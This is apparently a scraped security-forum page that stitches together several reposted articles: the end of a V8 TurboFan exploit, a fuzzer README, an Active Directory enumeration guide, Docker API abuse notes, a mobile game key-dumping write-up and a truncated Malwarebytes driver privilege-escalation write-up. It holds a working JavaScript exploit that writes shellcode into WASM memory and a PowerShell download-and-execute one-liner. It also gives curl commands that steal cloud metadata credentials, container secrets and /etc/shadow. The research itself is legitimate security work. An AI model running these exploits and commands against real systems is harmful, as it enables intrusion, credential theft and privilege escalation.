evil_ab = new ArrayBuffer(AB_LENGTH); packed_elements_array = Array.of(MARK1SMI,Math,MARK2SMI, get_pwnd); let y = (x == "foo") ? 4503599627370495 : 4503599627370493; let z = 2 + y + y ; // 2 + 4503599627370495 * 2 = 9007199254740992 z = z + 1 + 1 + 1; z = z - (4503599627370495*2); // may trigger the OOB R/W let leak = arr[z]; arr[z] = i2f(NEW_LENGTH64); // try to corrupt arr2.length // when leak == MAGIC, we are ready to exploit if (leak != MAGIC) { // [1] we should have corrupted arr2.length, we want to check it assert(f2i(leak), 0x0000000100000000, "bad layout for jsarray length corruption"); assert(arr2.length, NEW_LENGTHSMI); log("[+] corrupted JSArray's length"); // [2] now read evil_ab ArrayBuffer structure to prepare our fake array buffer let ab_len_idx = arr2.indexOf(i2f(AB_LENGTH)); // check if the memory layout is consistent assert(ab_len_idx != -1, true, "could not find array buffer"); assert(Number(f2i(arr2[ab_len_idx + 1])) & 1, false); assert(Number(f2i(arr2[ab_len_idx + 1])) > 0x10000, true); assert(f2i(arr2[ab_len_idx + 2]), 2); let ibackingstore_ptr = f2i(arr2[ab_len_idx + 1]); let fbackingstore_ptr = arr2[ab_len_idx + 1]; // copy the array buffer so as to prepare a good looking fake array buffer let view = new BigUint64Array(evil_ab); for (let i = 0; i < ARRAYBUFFER_SIZE / PTR_SIZE; ++i) { view[i] = f2i(arr2[ab_len_idx-3+i]); } log("[+] Found backingstore pointer : " + hexprintablei(ibackingstore_ptr)); // [3] corrupt packed_elements_array to replace the pointer to the Math object // by a pointer to our fake object located in our evil_ab array buffer let magic_mark_idx = arr2.indexOf(i2f(MARK1)); assert(magic_mark_idx != -1, true, "could not find object pointer mark"); assert(f2i(arr2[magic_mark_idx+2]) == MARK2, true); arr2[magic_mark_idx+1] = tagFloat(fbackingstore_ptr); // [4] leak wasm function pointer let ftagged_wasm_func_ptr = arr2[magic_mark_idx+3]; // we want to read get_pwnd log("[+] wasm function pointer at 0x" + hexprintablei(f2i(ftagged_wasm_func_ptr))); view[4] = f2i(ftagged_wasm_func_ptr)-1n; // [5] use RW primitive to find WASM RWX memory let rw_view = new BigUint64Array(packed_elements_array[1]); let shared_function_info = rw_view[WasmOffsets.shared_function_info]; view[4] = shared_function_info - 1n; // detag pointer rw_view = new BigUint64Array(packed_elements_array[1]); let wasm_exported_function_data = rw_view[WasmOffsets.wasm_exported_function_data]; view[4] = wasm_exported_function_data - 1n; // detag rw_view = new BigUint64Array(packed_elements_array[1]); let wasm_instance = rw_view[WasmOffsets.wasm_instance]; view[4] = wasm_instance - 1n; // detag rw_view = new BigUint64Array(packed_elements_array[1]); let jump_table_start = rw_view[WasmOffsets.jump_table_start]; // detag assert(jump_table_start > 0x10000n, true); assert(jump_table_start & 0xfffn, 0n); // should look like an aligned pointer log("[+] found RWX memory at 0x" + jump_table_start.toString(16)); view[4] = jump_table_start; rw_view = new Uint8Array(packed_elements_array[1]); // [6] write shellcode in RWX memory for (let i = 0; i < shellcode.length; ++i) { rw_view[i] = shellcode[i]; } // [7] PWND! let res = get_pwnd(); print(res); } return leak; } (() => { assert(this.alert, undefined); // only v8 is supported assert(this.version().includes("7.3.0"), true); // only tested on version 7.3.0 // exploit is the same for both windows and linux, only shellcodes have to be changed // architecture is expected to be 64 bits })() // needed for RWX memory load("wasm.js"); opt_me(""); for (var i = 0; i < 0x10000; ++i) // trigger optimization opt_me(""); let res = opt_me("foo"); Conclusion I hope you enjoyed this article and thank you very much for reading If you have any feedback or questions, just contact me on my twitter @__x86. Special thanks to my friends 0vercl0k and yrp604 for their review! Kudos to the awesome v8 team. You guys are doing amazing work! Recommended reading V8's TurboFan documentation Benedikt Meurer's talks Mathias Bynen's website This article on ponyfoo Vyacheslav Egorov's website Samuel Groß's 2018 BlackHat talk on attacking client side JIT compilers Andrea Biondo's write up on the Math.expm1 TurboFan bug Jay Bosamiya's write up on the Math.expm1 TurboFan bug Sursa: https://doar-e.github.io/blog/2019/01/28/introduction-to-turbofan/
-
- 1
-
-
Baresifter Baresifter is a 64-bit x86 instruction set fuzzer modeled after Sandsifter. In contrast to Sandsifter, Baresifter is intended to run bare-metal without any operating system. When loaded, the main fuzzing logic runs in ring0 as a tiny kernel. To safely execute arbitrary instructions, baresifter creates a single executable page in ring3 user space. For every instruction candidate, baresifter writes the instruction bytes to this user space page and attempts to execute it by exiting to user space. It follows the same algorithm as outlined in the original Sandsifter paper to find interesting instructions and guess instruction length. Building and running The build is currently tested on Fedora 29. The build requirements are clang++ 5.0 or later, scons, and qemu with KVM support (for easy testing). To start the build execute scons. Baresifter can be run in KVM with ./run.sh and will output its results to the console. To run baresifter bare-metal, use either grub or syslinux and boot baresifter.elf32 as multiboot kernel. It will dump instruction traces on the serial port. The serial port is hardcoded, so you might need to change that: git grep serial_output. Interpreting results Baresifter outputs data in a tabular format that looks like: E <exc> O <capstone-instruction-id> <status> | <instruction hex bytes> exc is the CPU exception that was triggered, when baresifter tried to execute the instruction. Exception 1 (#DB) indicates that an instruction was successfully executed. The capstone-instruction-id is an integer that represents the instruction that Capstone decoded. A zero in this field means that Capstone could not decode the instruction. status is currently one of BUG (indicating a capstone bug), UNKN (indicating an undocumented instruction), or OK (nothing interesting was found). A concrete example looks like this: E 0E O 0008 OK | 00 14 6D 00 00 00 00 E 01 O 0000 UNKN | 0F 0D 3E E 01 O 010A BUG | 66 E9 00 00 00 00 The first line is an instruction that decoded successfully and generated a page fault when executing (exception 0xE). Capstone knows this instruction. The second line is an undocumented instruction, i.e. the CPU executed it successfully (or at least didn't throw an undefined opcode exception), but Capstone has no idea what it is. The second line is a Capstone bug. Here both the CPU and Capstone both decoded an instruction, the CPU was able to execute it, but Capstone and the CPU disagree on the length of that instruction. Sursa: https://github.com/blitz/baresifter
-
La urmatoarea abatere ban amandoi.
-
Active Directory Penetration Dojo – AD Environment Enumeration -1 Hi everyone, we’ve discussed basics of Active Directory and different servers in AD in previous blog posts of this series. If you’ve not yet read that, please find that here in Part 1 and Part 2. We’ve also understood trust relationships in AD environment. You can read post on trust relationships here. Let’s have a look at the current post in which we’ll discuss how to enumerate an active directory domain and map various entities, trusts, relationships and privileges in it. Few things to understand: LDAP is used by Active directory as its access protocol. So when you enumerate information from AD, your query is sent to it as an LDAP query. AD relies on DNS as its locator service that enables the clients to locate domain controllers and other hosts in the domain through DNS queries. AD Database is NTDS.DIT AD supports several Naming conventions like: User Principal name: winsaafman@scriptdotsh.local DN (Distinguished Names) LDAP names: CN = Common name OU = Organisational Unit DC = Domain For example- CN=winsaafman,DC=corp,DC=scriptdotsh,DC=local Any standard domain user can enumerate active directory information. There is no need for administrative rights (not even local administrator). We’ll be using powershell a lot in the enumeration stage. In powershell, you get warning on running the scripts because of the execution policy setting policy. Execution Policy is just a way to stop users from accidentally executing scripts. Not really a security control, because it has builtin bypass parameters. (powershell -ExecutionPolicy bypass) as you can see in screenshot below: If you don’t want to save powershell module on disk and just load directly into memory and run some of its command, you can try it like this: powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1’);Get-NetDomain” 1 powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1’);Get-NetDomain” Beside the -exec Bypass, there are several other ways to evade powershell blocking which is already there on the internet. So I won’t be talking much about that. We can use the ADSI, .NET classes, DSquery, Powershell frameworks, CMD, WMI, AD Module etc. for enumerating active directory. In current blogpost, we’ll enumerate the domain using the Active Directory powershell module and powerview. In the discovery phase, we have to analyse many things about the client environment and locate their PII, network architecture, devices, critical business applications etc. Then finding threats to those critical assets. And looking for misconfigurations, vulnerabilities and weaknesses. Articol complet: https://scriptdotsh.com/index.php/2019/01/01/active-directory-penetration-dojo-ad-environment-enumeration-1/
-
- 3
-
-
-
Abusing Docker API | Socket CG / 8:32 AM Notes on abusing open Docker sockets This wont cover breaking out of docker containers Ports: usually 2375 & 2376 but can be anything Refs: https://blog.sourcerer.io/a-crash-course-on-docker-learn-to-swim-with-the-big-fish-6ff25e8958b0 https://www.slideshare.net/BorgHan/hacking-docker-the-easy-way https://blog.secureideas.com/2018/05/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-1.html https://blog.secureideas.com/2018/08/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-2.html https://infoslack.com/devops/exploring-docker-remote-api https://www.blackhat.com/docs/us-17/thursday/us-17-Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence_wp.pdf https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/ https://cert.litnet.lt/2016/11/owning-system-through-an-exposed-docker-engine/ https://medium.com/@riccardo.ancarani94/attacking-docker-exposed-api-3e01ffc3c124 https://www.exploit-db.com/exploits/42356 https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/docker_daemon_tcp.rb http://blog.nibblesec.org/2014/09/abusing-dockers-remote-apis.html https://www.prodefence.org/knock-knock-docker-will-you-let-me-in-open-api-abuse-in-docker-containers/ https://blog.ropnop.com/plundering-docker-images/ Enable docker socket (Create practice locations) https://success.docker.com/article/how-do-i-enable-the-remote-api-for-dockerd Having the docker API | socket exposed is essentially granting root to any of the containers on the system The daemon listens on unix:///var/run/docker.sock but you can bind Docker to another host/port or a Unix socket. The docker socket is the socket the Docker daemon listens on by default and it can be used to communicate with the daemon from within a container, or if configured, outside the container against the host running docker. All the docker socket magic is happening via the docker API. For example if we wanted to spin up an nginx container we'd do the below: Create a nginx container The following command uses curl to send the {“Image”:”nginx”} payload to the /containers/create endpoint of the Docker daemon through the unix socket. This will create a container based on Nginx and return its ID. $ curl -XPOST --unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Content-Type: application/json' http://localhost/containers/create {"Id":"fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65","Warnings":null} Start the container $ curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65/start As mentioned above you can also have the docker socket listen on a TCP port You can validate it's docker by hitting it with a version request $ curl -s http://open.docker.socket:2375/version | jq { "Version": "1.13.1", "ApiVersion": "1.26", "MinAPIVersion": "1.12", "GitCommit": "07f3374/1.13.1", "GoVersion": "go1.9.4", "Os": "linux", "Arch": "amd64", "KernelVersion": "3.10.0-514.26.2.el7.x86_64", "BuildTime": "2018-12-07T16:13:51.683697055+00:00", "PkgVersion": "docker-1.13.1-88.git07f3374.el7.centos.x86_64" } or with the docker client docker -H open.docker.socket:2375 version Server: Engine: Version: 1.13.1 API version: 1.26 (minimum version 1.12) Go version: go1.9.4 Git commit: 07f3374/1.13.1 Built: Fri Dec 7 16:13:51 2018 OS/Arch: linux/amd64 Experimental: false This is basically a shell into the container Get a list of running containers with the ps command docker -H open.docker.socket:2375 ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 72cd30d28e5c gogs/gogs "/app/gogs/docker/st…" 5 days ago Up 5 days 0.0.0.0:3000->3000/tcp, 0.0.0.0:10022->22/tcp gogs b522a9034b30 jdk1.8 "/bin/bash" 5 days ago Up 5 days myjdk8 0f5947860c17 centos/mysql-57-centos7 "container-entrypoin…" 8 days ago Up 8 days 0.0.0.0:3306->3306/tcp mysql 3965c004c7a7 192.168.32.134:5000/tensquare_config:1.0-SNAPSHOT "java -jar /app.jar" 8 days ago Up 8 days 0.0.0.0:12000->12000/tcp config 3f466b754971 42cb59080921 "/bin/bash" 8 days ago Up 8 days jdk8 6499013fdc2d registry "/entrypoint.sh /etc…" 8 days ago Up 8 days 0.0.0.0:5000->5000/tcp registry Exec into one of the containers docker -H open.docker.socket:2375 exec -it mysql /bin/bash bash-4.2$ whoami mysql Other commands Are there some stopped containers? docker -H open.docker.socket:2375 ps -a What are the images pulled on the host machine? docker -H open.docker.socket:2375 images I've frequently not been able to get the docker client to work well when it comes to the exec command but you can still code exec in the container with the API. The example below is using curl to interact with the API over https (if enabled). to create and exec job, set up the variable to receive the out put and then start the exec so you can get the output. Using curl to hit the API Sometimes you'll see 2376 up for the TLS endpoint. I haven't been able to connect to it with the docker client but you can with curl no problem to hit the docker API. Docker socket to metadata URL https://docs.docker.com/engine/api/v1.37/#operation/ContainerExec Below is an example of hitting the internal AWS metadata URL and getting the output list containers: curl --insecure https://tls-opendocker.socker:2376/containers/json | jq [ { "Id": "f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668", "Names": [ "/docker_snip_1" ], "Image": "dotnetify", "ImageID": "sha256:23b66a91f928ea6a49bce1be4eabedbafd41c5dfa4e76c1a94062590e54550ca", "Command": "cmd /S /C 'dotnet netify-temp.dll'", "Created": 1541018555, "Ports": [ { "IP": "0.0.0.0", "PrivatePort": 443, "PublicPort": 50278, ---SNIP--- List processes in a container: curl --insecure https://tls-opendocker.socker:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq { "Processes": [ [ "smss.exe", "7868", "00:00:00.062", "225.3kB" ], [ "csrss.exe", "10980", "00:00:00.859", "421.9kB" ], [ "wininit.exe", "10536", "00:00:00.078", "606.2kB" ], [ "services.exe", "10768", "00:00:00.687", "1.208MB" ], [ "lsass.exe", "10416", "00:00:36.000", "4.325MB" ], ---SNIP--- Set up and exec job to hit the metadata URL: curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}' {"Id":"4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55"} Get the output: curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d '{}' { "Code" : "Success", "LastUpdated" : "2019-01-29T20:12:58Z", "Type" : "AWS-HMAC", "AccessKeyId" : "ASIATRSNIP", "SecretAccessKey" : "CD6/h/egYHmYUSNIPSNIPSNIPSNIPSNIP", "Token" : "FQoGZXIvYXdzEB4aDCQSM0rRV/SNIPSNIPSNIP", "Expiration" : "2019-01-30T02:43:34Z" } Docker secrets relevant reading https://docs.docker.com/engine/swarm/secrets/ list secrets (no secrets/swarm not set up) curl -s --insecure https://tls-opendocker.socket:2376/secrets | jq { "message": "This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again."} list secrets (they exist) $ curl -s --insecure https://tls-opendocker.socket:2376/secrets | jq [ { "ID": "9h3useaicj3tr465ejg2koud5", "Version": { "Index": 21 }, "CreatedAt": "2018-07-06T10:19:50.677702428Z", "UpdatedAt": "2018-07-06T10:19:50.677702428Z", "Spec": { "Name": "registry-key.key", "Labels": {} }}, Check what is mounted curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "mount"]}' {"Id":"7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa"} Get the output by starting the exec curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa/start -d '{}' overlay on / type overlay proc on /proc type proc (rw,nosuid,nodev,noexec,relatime) tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755) devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666) sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime) ---SNIP--- mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime) /dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered) /dev/sda2 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered) /dev/sda2 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered) shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k) /dev/sda2 on /var/lib/registry type ext4 (rw,relatime,errors=remount-ro,data=ordered) tmpfs on /run/secrets/registry-cert.crt type tmpfs (ro,relatime) tmpfs on /run/secrets/htpasswd type tmpfs (ro,relatime) tmpfs on /run/secrets/registry-key.key type tmpfs (ro,relatime) ---SNIP--- Cat the mounted secret curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /run/secrets/registry-key.key"]}' {"Id":"3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30"} curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30/start -d '{}' -----BEGIN RSA PRIVATE KEY----- MIIJKAIBAAKCAgEA1A/ptrezfxUlupPgKd/kAki4UlKSfMGVjD6GnJyqS0ySHiz0 ---SNIP--- If you have secrets, it's also worth checking out services in case they are adding secrets via environment variables curl -s --insecure https://tls-opendocker.socket:2376/services | jq [{ "ID": "amxjs243dzmlc8vgukxdsx57y", "Version": { "Index": 6417 }, "CreatedAt": "2018-04-16T19:51:20.489851317Z", "UpdatedAt": "2018-12-07T13:44:36.6869673Z", "Spec": { "Name": "app_REMOVED", "Labels": {}, "TaskTemplate": { "ContainerSpec": { "Image": "dpage/pgadmin4:latest@sha256:5b8631d35db5514d173ad2051e6fc6761b4be6c666105f968894509c5255c739", "Env": [ "PGADMIN_DEFAULT_EMAIL=REMOVED@gmail.com", "PGADMIN_DEFAULT_PASSWORD=REMOVED" ], "Isolation": "default" Creating a container that has mounted the host file system curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}' {"Id":"0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192","Warnings":null} curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/start?name=test Read something from the host curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /mnt/etc/shadow"]}' {"Id":"140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6"} curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6/start -d '{}' root:$6$THEPASSWORDHASHWUZHERE:17717:0:99999:7::: daemon:*:17001:0:99999:7::: bin:*:17001:0:99999:7::: sys:*:17001:0:99999:7::: sync:*:17001:0:99999:7::: games:*:17001:0:99999:7::: Cleanup Stop the container curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/stop delete stopped containers curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune Sursa: https://carnal0wnage.attackresearch.com/2019/02/abusing-docker-api-socket.html
-
- 1
-
-
Reverse engineering of a mobile game, part 2: they updated, we dumped memory Guillaume Lesniak Feb 2 In my previous story, I successfully reverse-engineered a mobile Tower Defense game on Android, which uses Unity. I have had a few chats back and forth with the company behind the game, which were aware of the original article. Since then, they’ve upgraded their API to change their methodology: they updated the hash salt, and added encryption. Oh noes, we’re doomed! Or, are we? I’ll start this article off where I left in the first part, so make sure to read it if you haven’t already. State of things First things first, I fired up again my mitmproxy, and checked if the API calls changed. They did update the endpoint, and now the data looks encrypted, both in the request and the response: What used to be pure JSON is now unreadable bytes However, we can notice that they haven’t done anything about packet replay: performing the same actions on the game to produce another tournament query led to the same POST body and Hash being generated. Next, as previously, we need to dump the new libil2cpp.so and global-metadata.dat files, and run the tools on them, then load it into IDA. Since we already know where the hash was loaded (Crypto class constructor), and where the packets were built (HttpClient), we can kickstart a bit these parts. Digging into the code After giving IDA some time to load the few thousands functions, let’s have a look at the new and updated HttpPost method. Since I started off a clean disassembly project, I relabeled a few field based on the Il2CppDumper DLL assembly output, reversed with .NET Reflector, to get a cleaner pseudocode: We can find again our friendly Crypto__ComputeHash which computes the Hash value based on the unencrypted bytes, then the same bytes are fed into the Crypto.Encrypt method. So, they are indeed encrypting the body before sending it. Inspecting that method reveals Rijndael-based (AES) encryption: The cool thing about this is that they are using standard .NET crypto methods, which means that we’ll have all the fields description and details directly in the .NET Framework documentation, as well as example code to replicate their encryption and decryption process right from MSDN. Finally, the keys and salts moved from the Crypto class to a separate CryptoConstants class, but that won’t change much our work. Our lovely game developers even helped us with size in the C# fields: We know the offsets at which the computed key and IV are stored, so no need to manually calculate them! Also spoiler: I couldn’t manage to calculate them properly from the base Salt and Password, for some reason, so directly using Key and IV was good enough. So what we need to hack this new game revision is the AES key, and the new salt. With that, we should be able to encrypt and decrypt the messages and forge some to the server, as we could in the previous article. In my previous article, I was stuck at retrieving the secret bytes from the app code directly, which made me brute-force it originally, but I mentioned an alternative method: debugging on device. This time, we have no other choice: we can’t access byte arrays directly from static code (at least not that I know of), so our best and only way is to dump our device’s (or emulator) memory while the game is running, to get those bytes live. Let’s do it. Debugging a live process on device Our goal here is to dump the memory of the game, for example at a time where it is hashing a server message, to dump the hash-salt bytes, and the AES IV and key. To do that, we install IDA’s debugging server on our device, run it, and use ADB to forward the port to our host machine through USB. Once that’s done, we can attach our IDA debugger to any process on the device: We can attach to any process on our device But before actually attaching to a process, we need to set a few breakpoints in the pseudo-code. This will make the process pause, and IDA show the corresponding pseudo-code when the line is about to be executed by our phone’s CPU. First, as we want to dump the bytes that are appended to the JSON body before it is MD5-hashed, we just need to set a breakpoint where the final “salt” array is appended: Let’s break immediately after the salt bytes are loaded in ComputeHash Then, we want to break when encryption keys are used, so that we can dump the AES key and IV memory blocks: Note that if you want to break in a portion of code that is executed very early only once, you need to attach your debugger before those lines are executed. I haven’t found any trick to make IDA run the app from scratch with the debugger immediately attached, but luckily the Unity assembly takes some time to load, so we can tap the app icon, then immediately press Home to pause the game’s execution, giving us time to attach the IDA debugger, then resume the game. Here, we’re breaking at any call to the Decrypt method, so attaching afterwards is fine. A quick note on Dalvik and IDA: the debugger will catch a few signals sent by the Dalvik VM, caused by GC. Signals such as SIGPWR and SIGXCPU are then expected, so we need to set those as “ignore and pass to application” in the debugger setup, otherwise IDA will break the execution every time. Then, after attaching to the running game process, once we press a button that needs Decrypt and CalculateHash (any button that performs something online, like the Tournament button), the debugger will pause at the breakpoints we’ve set earlier: If I double-click the value I tagged “vSalt”, it will reveal the memory value. We skip the first 16 bytes (0x10), as those are Mono’s headers and metadata for byte arrays, and then we can see the salt value before our eyes: However, the AES IV and Key are put in a raw memory address that IDA didn’t wrap as a variable, so we’ll need some manual brain math from the pseudocode: **(_DWORD **)(dwCryptoClass + 80) *(_DWORD *)(*(_DWORD *)(dwCryptoClass + 80) + 4) We know, from the previous article, that the dwCryptoClass + 80 value is a pointer to the value of the first field of the class, since they start at 80 (0x50) offset. Our second field (the IV) is the next pointer (+ 4) at the value pointed by dwCryptoClass + 80. So here, to get the actual values for these two fields, we first need to take dwCryptoClass pointer (0xCCA71300 in my case), then add 0x50. This gives us our first pointer address (pointers are 4 bytes, since this is an ARMv7 library, so 32-bits memory addressing): The ARM instruction set is also little-endian, so our address has to be read from bottom to top: 0xE6BD6D60. Then, we have to jump there to get the actual pointers to each field byte array: Here, we have two pointers next to each other. If you get the operator priority right from the code extract above, our answers are hidden behind those two addresses: 0xE699F4D0 for the first field (Crypto._aesKey), and 0xCB2EBDE8 for the second field (Crypto._ivKey). Again, at each of those addresses, we add 0x10 to get the actual array bytes: Our pointer starts at 0xE699F4D0, and data starts 0x10 bytes later, at 0xE699F4E0. We know that the IV is 16 bytes long and the key is 32 bytes long, as that’s fairly standard, and also noted in the Rfc2898DeriveBytes .NET documentation (since we noted from the pseudocode that they used this class), so we just dump enough bytes from those two memory addresses. We can also infer that from the pseudocode. From there, we could write a small encryption/decryption using glorious Golang, but for the sake of not having to waste time fiddling with the algorithm settings, let’s reuse C# and decrypt a message we dumped earlier in mitmproxy: It works! On the left, the encrypted query. On the right, the decrypted JSON. Behind, our small C# decryption program running. We can use the same methodology then to dump the ComputeHash key. Since we have a direct “vSaltBytes” variable that we were able to map in IDA, double-clicking reveals the value. Updating our previous hash-calculation, and feeding it our decrypted query, leads us to the same hash as we had in the mitm’d request. Here we go again! We have successfully retrieved the AES key and IV that allows us to encrypt and decrypt the game’s network messages, and dumped the brand new 16-bytes (vs 6 bytes in the previous article) MD5 salt. With those information, we could build a new game cheat app and send forged requests to the server. More importantly, we’ve demonstrated how to successfully recover memory data from a running app on a live Android device, effectively letting you grab (or manipulate!) encryption keys. Cheers! Guillaume Lesniak Lover of new technologies, striving to push innovation forward. Servers, coding, security, machine learning, those are my things. Sursa: https://medium.com/@xplodwild/reverse-engineering-of-a-mobile-game-part-2-they-updated-we-dumped-memory-27046efdfb85
-
Exploiting Malwarebytes Anti-Exploit Feb 02, 2019 On October 25th, I found a bug in the Anti-Exploit driver of Malwarebytes v3.6.1.2711 that caused BSOD and finally exploited it to achieve an EoP from a standard user to SYSTEM. In short, it’s a combination of incomplete input validations and an insecure manner of accessing a file. In this blog post, I’ll walk through the process of how I exploited the bug. Systems affected include Windows 7 SP1 x86/64 and Windows 10 x86/64. In this post I’m assuming Windows 7/10 x86 as I wrote a complete exploit only for those systems. However, I think you can easily port it to x64 systems if needed. I’d like to express a special thanks to my friend Francesco Mifsud (@GradiusX) for borrowing some code from his GitHub repository. The final PoC is here. High Overview The first thing I did was to identify kernel mode drivers used by Malwarebytes and identify attack surfaces exposed. Using DriverView and WinObj, I found out the Anti-Exploit driver (mbae.sys) was accessible by a normal user through the device name “\\.\ESProtectionDriver”. As can be seen from the picture above, there are quite a few drivers from Malwarebytes with fancy names, but I didn’t look into the other drivers as I lost my interests a bit after having exploited the first target. Reversing The interesting part of the code in mbae.sys is the dispatch routine for the IRP major function code IRP_MJ_DEVICE_CONTROL. Identifying the routine is obvious, because it’s directly referenced from the DriverEntry. The following is the graph overview of the function sub_40338C that processes DeviceIoControl codes. The blue boxes are where DeviceIoControl codes are compared with some constants. Each of the yellow boxes calls the handler for a DeviceIoControl code. The red boxes validates the input buffer (SystemBuffer). From the blue boxes, 5 different DeviceIoControl codes can be identified: 0x22E000, 0x22E004, 0x22E008, 0x22E00C, 0x22E010. These codes means the driver uses the method of Buffered IO, though it’s not very relevant here. The validation in the red boxes obviously hinders attacks mindlessly using generic IOCTL fuzzers. The input buffer needs a DWORD size field, a 0x14 bytes hash field, and obfuscated data field like below: The obfuscated data is deobfuscated in the validation process (the bottom red box). Then I looked at the handlers for DeviceIoControl codes. Some of the handlers has try/except blocks and in each of the except blocks it creates a crash file under C:\, meaning if I could make the exception handler called in a controlled manner (no BSOD), I could create an arbitrary file at an arbitrary location by redirecting the file write. Initial Attack My initial attack was simply capturing and replaying legit DeviceIoControl requests made by the userland code of Malwarebytes. WinDBG and IDA revealed the uses of some the DeviceIoControl codes: 0x22E000 is used for an InjectionRequest (whatever it means) and called when the Anti-Exploit protection is turned on. 0x22E004 and 0x22E008 are for an UninjectionRequest and an AllowUnloadRequest respectively, which are called when a user turns the Anti-Exploit protection off. Luckily enough, I successfully got a BSOD by replaying an UninjectionRequest a few times. No fuzzing was needed. Analyzing Bug Next I stepped into the root cause of the bug. After some experiments, I learned that an exception could be caused by one of the two calls of _wcslwr as shown below. Here edi points to the first byte of the SystemBuffer. _wcslwr can fail. For example, if the argument of _wcslwr points to an unmapped or read-only page or a sequence of bytes that’s not terminated by a double nulls ‘\x00\x00’, an exception happens. If the location where the exception happened was in the Kernel Space, it leads to a BSOD. Avoiding BSOD The strategy is to always make an exception happen in the User Space. On the first call of _wcslwr, eax points to the offset 0x298 of the SystemBuffer. So if an exception happens here by accessing past the end of the SystemBuffer, it definitely leads to a BSOD. This can be avoided by putting a double nulls ‘\x00\x00’ at the offset 0x298. The next call of _wcslwr is more interesting (I mean, controllable). The DWORD at the offset 0x290 of the SystemBuffer is doubled and added to edi (the address of SystemBuffer). In my exploit, I put 0x40000000 at the offset 0x290 so the argument of _wcslwr points to the User Space. The DWORD at the offset 0x290 may be any value other then 0x00000000. The layout of the payload (before being obfuscated) is shown below. Sometimes it happens that no exception occurs, but it does no harm. Obfuscation I made some analysis on the deobfuscation scheme to send an obfuscated payload. Simply put, it’s just a triple XORs. The first step of deobfuscation is as simple as XORing the data part with the hash part extended to the length of the data by repetitions. A hash of the data is computed at this point and compared with the hash in the SystemBuffer. If they match, each byte of the data is XORed with the first byte (LSB) of the thread ID and the offset (mod 0x100) of the byte in the data. The steps of 